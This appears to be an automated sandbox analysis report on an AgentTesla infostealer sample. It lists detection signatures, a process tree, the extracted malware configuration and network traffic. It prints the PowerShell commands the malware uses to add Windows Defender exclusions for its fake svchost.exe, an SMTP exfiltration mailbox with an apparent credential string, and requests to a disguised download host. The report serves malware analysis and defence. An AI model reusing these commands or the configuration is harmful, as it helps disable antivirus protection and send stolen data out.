
Analysis Report qINcOlwRud.exe

Overview

General Information

Sample Name: qINcOlwRud.exe
Analysis ID: 383942
MD5: d6b29add344d2284845f133b8505126e
SHA1: fdb44b36f8c31a60a47db4f4ce6d4975367d7a7c
SHA256: 552a8d763c86bb50ded18cf8f790f18828c471ec5a4d3cac71eaf7693314a04c
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Drops PE files with benign system names
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to delay execution (extensive OutputDebugStringW loop)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

Startup

  • System is w10x64
  • qINcOlwRud.exe (PID: 5476 cmdline: 'C:\Users\user\Desktop\qINcOlwRud.exe' MD5: D6B29ADD344D2284845F133B8505126E)
    • powershell.exe (PID: 908 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1364 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\qINcOlwRud.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3880 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5972 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 5756 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • qINcOlwRud.exe (PID: 4456 cmdline: C:\Users\user\Desktop\qINcOlwRud.exe MD5: D6B29ADD344D2284845F133B8505126E)
    • WerFault.exe (PID: 6000 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5476 -s 1936 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5512 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5820 cmdline: 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' MD5: D6B29ADD344D2284845F133B8505126E)
    • powershell.exe (PID: 6236 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6264 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6320 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6644 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6692 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • svchost.exe (PID: 4468 cmdline: C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe MD5: D6B29ADD344D2284845F133B8505126E)
  • svchost.exe (PID: 3776 cmdline: 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' MD5: D6B29ADD344D2284845F133B8505126E)
    • powershell.exe (PID: 6860 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6908 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6988 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 4664 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5328 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5868 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5412 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1320 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2000 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "m4ximilia@yandex.comx103860*&1333smtp.yandex.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000002.304230234.000000000434C000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Unpacked PEs

Source | Rule | Description | Author
0.2.qINcOlwRud.exe.43826f0.7.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.qINcOlwRud.exe.434c6d0.8.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.qINcOlwRud.exe.434c6d0.8.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.qINcOlwRud.exe.43826f0.7.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 0.2.qINcOlwRud.exe.43826f0.7.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "m4ximilia@yandex.comx103860*&1333smtp.yandex.com"}
Multi AV Scanner detection for dropped file
Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe | ReversingLabs: Detection: 27%
Multi AV Scanner detection for submitted file
Source: qINcOlwRud.exe | Virustotal: Detection: 21%
Source: qINcOlwRud.exe | ReversingLabs: Detection: 27%
Machine Learning detection for dropped file
Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: qINcOlwRud.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 104.21.56.119:443 -> 192.168.2.3:49683 version: TLS 1.0
Source: C:\Users\user\Desktop\qINcOlwRud.exe | Directory created: C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV
Source: C:\Users\user\Desktop\qINcOlwRud.exe | Directory created: C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
Source: qINcOlwRud.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbd source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER66E4.tmp.dmp.14.dr
Source: Binary string: System.Xml.ni.pdb source: WER66E4.tmp.dmp.14.dr
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
Source: Binary string: Accessibility.pdb source: WER66E4.tmp.dmp.14.dr
Source: Binary string: C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.PDB source: svchost.exe, 0000000D.00000002.396329170.0000000000CF7000.00000004.00000010.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER66E4.tmp.dmp.14.dr
Source: Binary string: np6pVisualBasic.pdb43 source: svchost.exe, 0000000D.00000002.396329170.0000000000CF7000.00000004.00000010.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb* source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
Source: Binary string: System.Drawing.pdb`] source: WER66E4.tmp.dmp.14.dr
Source: Binary string: System.Configuration.ni.pdb source: WER66E4.tmp.dmp.14.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER66E4.tmp.dmp.14.dr
Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
Source: Binary string: np6pVisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\qINcOlwRud.PDB source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
Source: Binary string: System.Configuration.pdb source: WER66E4.tmp.dmp.14.dr
Source: Binary string: .pdb% source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmp
Source: Binary string: System.Xml.pdb source: WER66E4.tmp.dmp.14.dr
Source: Binary string: System.pdb source: WER66E4.tmp.dmp.14.dr
Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb source: WER66E4.tmp.dmp.14.dr
Source: Binary string: System.Core.ni.pdb source: WER66E4.tmp.dmp.14.dr
Source: Binary string: (P+pLC:\Windows\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
Source: Binary string: System.Windows.Forms.pdb source: WER66E4.tmp.dmp.14.dr
Source: Binary string: C:\Users\user\Desktop\qINcOlwRud.PDB( source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
Source: Binary string: mscorlib.pdb source: WER66E4.tmp.dmp.14.dr
Source: Binary string: System.Windows.Forms.pdb0 source: WER66E4.tmp.dmp.14.dr
Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
Source: Binary string: System.Drawing.pdb source: WER66E4.tmp.dmp.14.dr
Source: Binary string: mscorlib.ni.pdb source: WER66E4.tmp.dmp.14.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: qINcOlwRud.exe, 00000000.00000002.269744328.0000000001260000.00000004.00000020.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER66E4.tmp.dmp.14.dr
Source: Binary string: System.Core.pdb source: WER66E4.tmp.dmp.14.dr
Source: Binary string: qINcOlwRud.PDB source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbB source: qINcOlwRud.exe, 00000000.00000002.269873802.0000000001293000.00000004.00000020.sdmp
Source: Binary string: System.Xml.pdbD source: WER66E4.tmp.dmp.14.dr
Source: Binary string: svchost.PDB source: svchost.exe, 0000000D.00000002.396329170.0000000000CF7000.00000004.00000010.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WER66E4.tmp.dmp.14.dr
Source: Binary string: System.ni.pdb source: WER66E4.tmp.dmp.14.dr
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A8BB9FBC655E731A0C6CD58E2C4B52B7.html HTTP/1.1 | UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 | Host: myliverpoolnews.cf | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C1A7BF393BEFEDE5EF77372F8A536BC.html HTTP/1.1 | UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 | Host: myliverpoolnews.cf
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.html HTTP/1.1 | UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 | Host: myliverpoolnews.cf
Source: Joe Sandbox View | IP Address: 104.21.56.119 104.21.56.119
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: unknownDNS traffic detected: queries for: myliverpoolnews.cf
            Source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
            Source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
            Source: svchost.exe, 0000000B.00000003.266602671.000001BDC7899000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
            Source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
            Source: qINcOlwRud.exe, 00000000.00000002.270729266.0000000002FF1000.00000004.00000001.sdmpString found in binary or memory: http://myliverpoolnews.cf
            Source: qINcOlwRud.exe, 00000000.00000002.270729266.0000000002FF1000.00000004.00000001.sdmpString found in binary or memory: http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-
            Source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmp, svchost.exe, 0000000B.00000003.266602671.000001BDC7899000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/BreadcrumbList
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/ListItem
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/NewsArticle
            Source: qINcOlwRud.exe, 00000000.00000002.270729266.0000000002FF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: svchost.exe, 00000015.00000002.325607355.0000023ABEC13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com:
            Source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js
            Source: svchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://c.amazon-adsystem.com/aax2/apstag.js
            Source: svchost.exe, 00000015.00000003.313784192.0000023ABEC49000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
            Source: svchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
            Source: svchost.exe, 00000015.00000002.326476300.0000023ABEC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
            Source: svchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
            Source: svchost.exe, 00000015.00000003.290781587.0000023ABEC30000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
            Source: svchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
            Source: svchost.exe, 00000015.00000002.326476300.0000023ABEC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
            Source: svchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
            Source: svchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
            Source: svchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
            Source: svchost.exe, 00000015.00000003.290781587.0000023ABEC30000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
            Source: svchost.exe, 00000015.00000002.326636259.0000023ABEC42000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
            Source: svchost.exe, 00000015.00000002.326636259.0000023ABEC42000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
            Source: svchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
            Source: svchost.exe, 00000015.00000002.326740904.0000023ABEC4B000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.314007807.0000023ABEC40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
            Source: svchost.exe, 00000015.00000003.290781587.0000023ABEC30000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
            Source: svchost.exe, 00000015.00000003.313784192.0000023ABEC49000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000015.00000002.326740904.0000023ABEC4B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000015.00000002.326740904.0000023ABEC4B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000015.00000002.327217757.0000023ABEC64000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.313784192.0000023ABEC49000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.326636259.0000023ABEC42000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
            Source: svchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
            Source: svchost.exe, 00000015.00000002.326476300.0000023ABEC3D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
            Source: svchost.exe, 00000015.00000003.290781587.0000023ABEC30000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/ampconfig.json&quot;
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/felix.min.js
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17156435.ece/ALTERNATES/s615/1_GettyImages-1183794835.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s220b/0_Salah-Pressing.jpg
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s180/0_Curtis-10.png
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg
